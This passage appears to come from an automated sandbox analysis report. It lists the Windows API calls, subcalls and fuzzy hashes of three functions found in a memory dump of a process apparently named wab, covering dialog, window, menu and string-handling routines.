                                                • DeleteObject.GDI32(?), ref: 00401226
                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                • memset.MSVCRT ref: 0040128E
                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                • String ID:
                                                • API String ID: 2998058495-0
                                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • wcslen.MSVCRT ref: 0044406C
                                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                • strlen.MSVCRT ref: 004440D1
                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                • memcpy.MSVCRT ref: 004440EB
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                • String ID:
                                                • API String ID: 577244452-0
                                                • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                • sprintf.MSVCRT ref: 0040909B
                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                • String ID: menu_%d
                                                • API String ID: 1129539653-2417748251
                                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                Uniqueness

                                                Uniqueness Score: -1.00%